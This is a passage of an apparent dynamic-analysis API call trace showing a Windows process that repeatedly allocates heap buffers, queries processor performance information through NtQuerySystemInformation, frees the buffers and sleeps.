Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.708] Sleep (dwMilliseconds=0x110) [0238.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.720] Sleep (dwMilliseconds=0x110) [0238.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.735] Sleep (dwMilliseconds=0x110) [0238.756] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.756] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.757] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.757] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.757] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.757] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.757] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.757] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.758] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.758] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.758] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.758] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.759] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.763] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.763] Sleep (dwMilliseconds=0x110) [0238.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.798] Sleep (dwMilliseconds=0x110) [0238.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.814] Sleep (dwMilliseconds=0x110) [0238.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.832] Sleep (dwMilliseconds=0x110) [0238.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.862] Sleep (dwMilliseconds=0x110) [0238.872] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.872] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.877] Sleep (dwMilliseconds=0x110) [0238.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.892] Sleep (dwMilliseconds=0x110) [0238.958] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.958] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.958] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.959] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.959] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.959] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.959] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.960] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.960] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.960] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.960] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.960] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.961] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.961] Sleep (dwMilliseconds=0x110) [0238.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.966] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.966] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.969] Sleep (dwMilliseconds=0x110) [0238.981] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.981] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.982] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.982] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.982] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.986] Sleep (dwMilliseconds=0x110) [0239.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.003] Sleep (dwMilliseconds=0x110) [0239.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.013] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.014] HeapFree (in: hHeap=0x2560000, 